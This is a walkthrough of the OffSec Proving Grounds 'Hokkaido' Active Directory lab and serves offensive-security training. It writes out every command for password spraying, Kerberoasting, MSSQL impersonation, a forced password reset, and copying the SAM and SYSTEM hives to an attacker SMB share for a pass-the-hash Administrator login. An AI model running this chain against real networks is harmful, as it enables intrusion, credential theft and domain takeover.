Initial Reconnaissance
To begin our investigation, we start with a comprehensive Nmap scan. This helps us find all open TCP ports and identify the services and versions running on each.
sudo nmap -Pn -n 192.168.244.40 -sC -sV -p- --open -vExplanation of Nmap flags:
Pn: Treat the host as online without pinging it.n: Don’t resolve hostnames (faster scan).sC: Run default scripts for basic service discovery.sV: Attempt to detect service versions.p-: Scan all TCP ports from 1 to 65535.-open: Show only ports that are open.v: Enable verbose output.
Nmap Results:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-25 00:48:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
|_ssl-date: 2025-05-25T00:49:23+00:00; -1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
|_ssl-date: 2025-05-25T00:49:23+00:00; -1s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.244.40:1433:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
|_ Product_Version: 10.0.20348
| ms-sql-info:
| 192.168.244.40:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-05-25T00:49:23+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-02T02:13:54
| Not valid after: 2054-08-02T02:13:54
| MD5: 594a:702f:d421:ff2f:411d:d1ea:73f1:2c3f
|_SHA-1: f4ad:4152:6a70:f50b:ec47:5026:400f:8ffb:0dc3:5178
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T00:49:24+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: hokkaido-aerospace.com0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T00:49:24+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.hokkaido-aerospace.com
| Issuer: commonName=hokkaido-aerospace-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-07T13:54:18
| Not valid after: 2024-12-06T13:54:18
| MD5: fd8f:1b08:1ee3:af12:e450:0c81:e458:9a0b
|_SHA-1: 9b94:20e0:ea8b:7d6d:c1fa:4976:5547:cd45:3115:3414
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
| Product_Version: 10.0.20348
|_ System_Time: 2025-05-25T00:49:15+00:00
| ssl-cert: Subject: commonName=dc.hokkaido-aerospace.com
| Issuer: commonName=dc.hokkaido-aerospace.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-05-24T00:46:07
| Not valid after: 2025-11-23T00:46:07
| MD5: 6a95:c688:b290:a487:8aef:4e1b:f548:593d
|_SHA-1: 6afe:2a34:f9b2:2755:068d:5ba2:f7d5:1e80:761b:3dda
|_ssl-date: 2025-05-25T00:49:24+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: 403 - Forbidden: Access is denied.
8531/tcp open unknown
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49684/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49685/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
58538/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 192.168.244.40:58538:
| Target_Name: HAERO
| NetBIOS_Domain_Name: HAERO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hokkaido-aerospace.com
| DNS_Computer_Name: dc.hokkaido-aerospace.com
| DNS_Tree_Name: hokkaido-aerospace.com
|_ Product_Version: 10.0.20348
| ms-sql-info:
| 192.168.244.40:58538:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 58538
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-02T02:13:54
| Not valid after: 2054-08-02T02:13:54
| MD5: 594a:702f:d421:ff2f:411d:d1ea:73f1:2c3f
|_SHA-1: f4ad:4152:6a70:f50b:ec47:5026:400f:8ffb:0dc3:5178
|_ssl-date: 2025-05-25T00:49:23+00:00; -1s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-25T00:49:17
|_ start_date: N/A
Key Observations from the Nmap Results:
- The host appears to be a Windows Domain Controller.
- Important services are open: Kerberos (88), LDAP (389/636), SMB (445), RDP (3389), MSSQL (1433, 58538).
- The domain is:
hokkaido-aerospace.com - The domain controller hostname is:
dc.hokkaido-aerospace.com
Add the following line to your /etc/hosts to ensure DNS resolution works for domain tools:
192.168.244.40 dc.hokkaido-aerospace.comActive Directory Username Enumeration (Kerbrute)
We use Kerbrute to find valid usernames using Kerberos protocol responses.
./kerbrute userenum --dc dc.hokkaido-aerospace.com -d hokkaido-aerospace.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txtkerbrute userenum: Run the username enumeration module.-dc dc.hokkaido-aerospace.com: Specify the domain controller (DC) to talk to (you discovered this from the nmap scan).d hokkaido-aerospace.com: Set the Active Directory domain name./usr/share/seclists/Usernames/xato-net-10-million-usernames.txt: This is a large wordlist of common usernames, used to test which ones exist in the domain.
Valid Usernames Discovered:
- info
- administrator
- discovery
Save these usernames in a file usernames.txt, and create a passwords.txt list:
Winter2023
Summer2023
Spring2023
Fall2023
info
administrator
discoverySMB Password Spraying with NetExec
We use NetExec (nxc) to check if any username/password combination works against SMB.
nxc smb 192.168.244.40 --shares -u usernames.txt -p passwords.txt --continue-on-success
We discover that info:info is a valid login.
Let’s list the shares using this credential:
nxc smb 192.168.244.40 --shares -u info -p info
We see a writable share called homes. We can use impacket-psexec to gain a entry onto the share but this did not work.
Using smbclient, we explore this share:
smbclient //192.168.244.40/homes -U infoIn the homes share, there are directories usernames. Nothing useful was found here.
Next, we explore the NETLOGON share:
smbclient //192.168.244.40/NETLOGON -U infoIn the NETLOGON share, there is a temp folder which contains a file called password_reset.txt.
Let’s obtain the file and see what is in it:
get password_reset.txt
In password_reset.txt we see the initial password which is Start123!.
Password Re-spraying with New Credential
Try the new password across known usernames:
nxc smb 192.168.244.40 --shares -u usernames.txt -p 'Start123!' --continue-on-success
We find another valid user: discovery:Start123!.
Update the passwords.txt with:
info
Start123!Testing WinRM Access
Try WinRM access using:
nxc winrm 192.168.244.40 -u usernames.txt -p passwords.txt --continue-on-success
We can also try using Evil-WinRM but WinRM does not work.
Kerberoasting with Impacket
At this stage, we have a valid set of Active Directory credentials: discovery:Start123!. This allows us to attempt Kerberoasting, an attack used to extract service account hashes from the Kerberos Ticket Granting Service (TGS).
What is Kerberoasting? Kerberoasting targets service accounts in Active Directory that have Service Principal Names (SPNs) assigned. When you request a service ticket (TGS) for such an account, the domain controller responds with a ticket that is encrypted using the service account's password hash. An attacker with a valid AD account can request these tickets and then attempt to crack them offline using brute-force or wordlist attacks to recover plaintext passwords.
Why use it here? We’ve already exhausted simpler attacks like password spraying and SMB enumeration. Kerberoasting provides an opportunity to escalate access by targeting service accounts that may have weak passwords. These accounts often have elevated privileges and can lead to further compromise.
What we hope to gain:
- Access to another user account (like
maintenance) that may have higher privileges. - The ability to pivot into systems or services that are restricted.
Run the attack:
impacket-GetUserSPNs -dc-ip 192.168.244.40 hokkaido-aerospace.com/discovery:Start123! -request
We get hashes for discovery and maintenance. Try to crack maintenance user’s hash:
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt
Unfortunately, we were not able to crack the hash.
MSSQL Credential Spraying
We can spray credentials using NetExec against MSSQL service:
nxc mssql 192.168.244.40 -u usernames.txt -p passwords.txt --continue-on-success
We confirm valid credentials for info and discovery.
Next, we attempt to connect to Microsoft SQL Server using these credentials:
impacket-mssqlclient 'hokkaido-aerospace.com/discovery':'Start123!'@192.168.244.40 -dc-ip 192.168.244.40 -windows-auth
Once inside, we want to look for sensitive or interesting databases. A good first step is to enumerate available databases:
SELECT name FROM master..sysdatabases;
We see five databases listed. One of them, hrappdb, stands out as possibly containing HR-related information.
USE hrappdb
SQL (HAERO\discovery guest@master)> use hrappdb
ERROR(DC\SQLEXPRESS): Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.But access is denied. This means our current user discovery does not have permission to view the contents of hrappdb.
To bypass this, we check if we can impersonate another SQL login:
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
SQL (HAERO\discovery guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
--------------
hrappdb-reader This query reveals logins that have granted the IMPERSONATE privilege. In this case, hrappdb-reader is one such login we’re allowed to impersonate
We impersonate hrappdb-reader.
EXECUTE AS LOGIN = 'hrappdb-reader'
USE hrappdb;
SQL (HAERO\discovery guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader guest@master)> use hrappdb
ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.Now we are in! We switch to the hrappdb database and start exploring its schema to find out what tables it contains:
SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;SQL (hrappdb-reader hrappdb-reader@hrappdb)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
hrappdb dbo sysauth b'BASE TABLE' 
We discover a table called sysauth, which sounds like it could store credentials.
We query the table:
SELECT * FROM sysauth;
We discover credential hrapp-service:Untimed$Runny.
We can add this to our usernames and password wordlist and spray the credentials using smb, rdp and winrm.
nxc smb 192.168.244.40 -u usernames.txt -p passwords.txt --continue-on-success
nxc winrm 192.168.244.40 -u usernames.txt -p passwords.txt --continue-on-success
nxc rdp 192.168.244.40 -u usernames.txt -p passwords.txt --continue-on-success
We can verify that hrapp-service:Untimed$Runny is a valid credential but we can’t gain access via RDP or WinRM at this stage.
BloodHound Analysis
Use bloodhound-python to analyse AD relationships:
bloodhound-python -u "hrapp-service" -p 'Untimed$Runny' -d hokkaido-aerospace.com -c all --zip -ns 192.168.244.40
Start neo4j and run bloodhound.
sudo neo4j start
bloodhound&Load the zip file on bloodhound and refresh the database. Mark hrapp-service as owned principal.
Click on Node Info and under Outbound Object Control, select First Degree Object Control. From here, we can see hrapp-service has GenericWrite Permission to Hazel.Green user which belongs to the TIER2-ADMINS group.
If we right-click on GenericWrite and select Help, Bloodhound guides us how to abuse this privilege.
We will use targetedKerberoas.py to attempt a targeted Kerberoast attack.
targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.244.40
We successfully get hashes for Hazel.Green, discovery and maintenance.
Since we already have a password for the discovery user, we can crack the user hashes for Hazel.Green and maintenance.
sudo hashcat -m 13100 hazel.hash /usr/share/wordlists/rockyou.txt
By cracking the hash we get the password: haze1988.
Privilege Escalation via Password Reset
Returning to Bloodhound, we see Molly.Smith is a member of the IT group.
By selecting Finding Shortest Paths to Domain Admins, we can see that Molly.Smith is a high value target.
Returning to Hazel.Green, if we select Explicit Object Controllers under Inbound Control Rights, we can see that Hazel.Green has GenericAll relationship with Domain Admins. Right-clicking on GenericAll and selecting Help gives us more information on how this can be abused.
We can force change password of Molly.Smith.
Change password for Molly Smith:
net rpc password "molly.smith" "P@ssw0rd123" -U "hokkaido-aerospace.com"/"Hazel.Green"%"haze1988" -S "dc.hokkaido-aerospace.com"We can validate the changed password by using NetExec:
nxc rdp 192.168.244.40 -u 'molly.smith' -p 'P@ssw0rd123'
We can now login to the target machine with RDP:
xfreerdp /u:molly.smith /p:'P@ssw0rd123' /v:192.168.244.40 /cert-ignore /auto-reconnect +clipboard /dynamic-resolutionThe user flag local.txt is in C:\local.txt
Extracting NTLM Hash from SAM and SYSTEM
Open cmd as administrator and enter in credentials for molly.smith:
whoami /priv
We now have access to a user (Molly Smith) who has the SeBackupPrivilege. This is a Windows privilege that allows users to read any file on the system for the purpose of backing it up, even if they would normally be denied access. Although this privilege may show as "disabled" in tools like whoami /priv, it is still usable when explicitly enabled in code or through specific backup-related functions.
Why is this useful for privilege escalation? Even though we don’t have administrative rights yet, we can abuse SeBackupPrivilege to read sensitive files like the SAM (Security Account Manager) and SYSTEM registry hives. These contain password hashes for local accounts, including the built-in Administrator.
We make a directory called temp and create backup copies of the registry hives:
cd c:\
mkdir c:\temp
reg save hklm\sam c:\temp\sam\
reg save hklm\system c:\temp\system
Then transfer them to our attacker machine and extract the hashes.
Set up SMB on Kali for a file transfer:
impacket-smbserver test . -smb2support -username kali -password kaliOn target machine run:
net use m: \\192.168.45.219\test /user:kali kali
copy sam m:\
copy system m:\
Use impacket’s secretsdump to extract Administrator’s hash from sam and system databases.
impacket-secretsdump LOCAL -system system -sam sam
Use the recovered NTLM hash to gain an Administrator Evil-winRM session:
evil-winrm -i 192.168.244.40 -u Administrator -H 'd752482897d54e239376fddb2a2109e4'
The root flag proof.txt is located in the Administrator’s desktop.
Summary
In this walkthrough of the OffSec Proving Grounds Practice lab Hokkaido, we explored a simulated Active Directory environment and leveraged a range of techniques to escalate from unauthenticated access to full domain admin control. Starting with service enumeration and password spraying, we uncovered valid credentials and used Kerberoasting, SQL Server impersonation, and BloodHound analysis to discover privilege escalation paths. Key techniques included abusing SeBackupPrivilege to dump NTLM hashes and using impersonation within MSSQL to access sensitive data. This lab demonstrates the importance of securing service accounts, hardening AD privileges, and monitoring credential exposure.